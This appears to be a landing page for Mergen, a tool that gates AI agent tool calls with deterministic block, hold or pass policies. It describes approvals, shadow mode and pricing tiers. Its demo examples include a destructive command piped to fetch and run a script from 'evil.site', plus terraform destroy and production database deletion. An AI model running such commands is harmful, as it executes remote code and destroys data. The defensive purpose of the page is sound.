The command never runs.
Every AI action receives one verdict before it executes.
Verdicts come from policy, not model inference.
terraform destroy -auto-approveSimulated for illustration — a real decision returns before this animation would finish.
534 adversarial and benign cases, each run 5 times — 2,670 evaluations, 0 non-deterministic verdicts. See methodology →
How Mergen fits into your day
▼
run_command("rm -rf ./logs && curl evil.site | bash")remote script execution
The handler never ran. The agent receives a structured error explaining why, and what to do instead — then reformulates within policy.
Why teams install Mergen
The same applyGate() call you just watched run above evaluates every AI tool call, on every install.
Enforced, not suggested
You just watched it happen: rm -rf, terraform destroy, DROP TABLE — BLOCK, before the handler runs. Schema migrations, K8s scale-downs, secret reads — HOLD, routed to Slack or your terminal for one-click approval. Everything else — PASS, unchanged.
14-day shadow window
First install starts in observation mode: policy rules log what they would have blocked instead of blocking, while injection and agent-identity protections stay live. See which rules fire against your real agent traffic — and which never fire — then promote to full enforcement with one command, or let it activate when the window ends.
Team memory
Every time someone overrides a block or approves a hold, that decision — and the reason behind it — is recorded. The next time an agent hits the same situation, Mergen surfaces what your team decided last time instead of asking the same question cold. It never auto-approves; it just makes sure a decision your team already made doesn't have to be re-litigated from scratch. (This is the override corpus — see the docs for how it works.)
How Mergen works
You install one thing: mergen-server. Once connected, every decision it makes rolls up to My Organization at mergen.app.
Three local surfaces, one runtime underneath.
- ✓Install and configure Mergen
mergen-server setup - ✓Check protection coverage
mergen-server status - ✓Resume held actions
mergen-server approve - ✓Diagnose runtime health
mergen-server doctor - ✓Launch My Machine
mergen-server dashboard
- ✓Block notifications inline
- ✓Resume held actions from the panel
- ✓See which policy triggered a decision
- ✓Installs and starts automatically — never a second gate
- ✓Incident history, approvals & local policies
- ✓Audit & compliance exports
- ✓Self-hosted — one dashboard regardless of IDE
- ✓Sync shared policies
- ✓Team approvals & reusable decisions
- ✓Organization usage reporting
mergen-server loginMergen enforces through runtime adapters — Claude Code hooks, MCP interception, the CI gate, and native IDE integrations — the same loop Datadog, PagerDuty, and Kubernetes plug into. See where interception happens → Full integration list →
The shared view across connected runtimes
When a team connects their runtimes, My Organization becomes the place to see what needs attention, which machines are drifting, which approvals are blocking work, and how shared policy is rolling out.
Fleet
Fleet lists every connected runtime's health, policy version, and enforcement mode — so drift shows up in one shared place before it turns into an incident or a blind spot.
Usage
Usage rolls up allow / block / hold counts from every runtime into one organization view — so you can see activity across the fleet without exporting a single log.
Approvals
Approve or deny from Slack, on the machine, or in the console — whichever the team reaches first. Every resolved hold becomes shared history and a candidate for reusable policy.
Runtime fleet
Every connected gate, its policy, and what needs attention.
Production database mutation
aws rds delete-db-instance --db-instance-identifier prod-db- Runtime
- payments-api
- Policy
- production-mutation
- Expires
- 14:32 remaining
The action is held. The handler has not run.
Fleet, Usage, Approvals, and shared policy live in My Organization at mergen.app. See how teams adopt it →
Everything runs locally — the cloud connection is optional
A tool call is a decision the agent needs answered before the handler runs. A network round-trip in that path would force a choice between stalling every call or failing open — either reintroduces the exact race condition a sub-millisecond local gate exists to close. Paid plans sync policy, approvals, and visibility to My Organization; they never relocate enforcement off your machine.
The 100% figure is measured against a curated, continuously-maintained 534-case corpus, not a guarantee against every possible input. Zero open evasion gaps: every disclosed gap is closed.
Plans for every team size
Every plan runs the identical security gate — paid tiers add coordination (shared rules, Slack approvals, org-wide visibility), never a different verdict.
Free protects yourself. Starter protects your team. Growth governs your organization.
Protect yourself locally — every unsafe command still gets blocked before it runs.
- ✓Blocks destructive commands before they run
- ✓Deterministic rules decide pass, block, or hold — no AI guesswork
- ✓Understands what a command actually does, not just its text
- ✓Watches first — nothing blocks until you turn it on
- ✓Remembers every action, no time limit
- ✓See every action an agent took, in order
Protect your team — coordinate approvals and build safer workflows from your own team's experience.
- ✓Everything in Free
- ✓Organization Memory — approvals become reusable policy your team never re-decides
- ✓Risky actions wait for one-click Slack approval, with automatic escalation if unanswered
- ✓Ephemeral, task-scoped AWS/GCP/Azure credentials — no long-lived secrets in agent config
- ✓CI gate flags risky pull requests before merge (1 repository)
- ✓Advisory AI code-review comments on pull requests
- ✓Audit trail export (CSV) + daily/weekly digest
- ✓5 included seats, pooled usage, one bill — cloud dashboard included
Sign in required · No card for trial · Cancel anytime
Govern AI agent usage across the organization — one set of rules, proof for every stakeholder who asks.
- ✓Everything in Starter
- ✓20 included seats
- ✓Role-based & quorum approvals — signature-verified Slack identity, N sign-offs for high-risk actions
- ✓CI gate — unlimited repositories included
- ✓Fleet-wide visibility into every teammate's gate decisions
- ✓SOC 2 / ISO 27001 control mapping in the compliance report
- ✓Stream blocked actions and the agent ledger to your SIEM (Splunk HEC or webhook)
- ✓Same-day support + private Slack channel
Sign in required · No card for trial · Cancel anytime
Included limits (seats, protected tool calls, CI repositories) are metered, never enforced against safety: exceeding a limit adds an upgrade notice (and, if usage-billing is enabled on your account, an overage line), while every call and every build keeps getting the identical evaluation, blocking, and audit trail. The security decision is plan-agnostic by architectural invariant — paid plans change delivery channels, collaboration, and visibility, never the verdict.
Common questions
What comes up before anyone runs npx mergen-server — and before starting a trial.
Secure your workspace in under 2 minutes.
Protect every developer workstation locally first. Connect your organization when you want shared policies, approvals, and reporting across connected runtimes.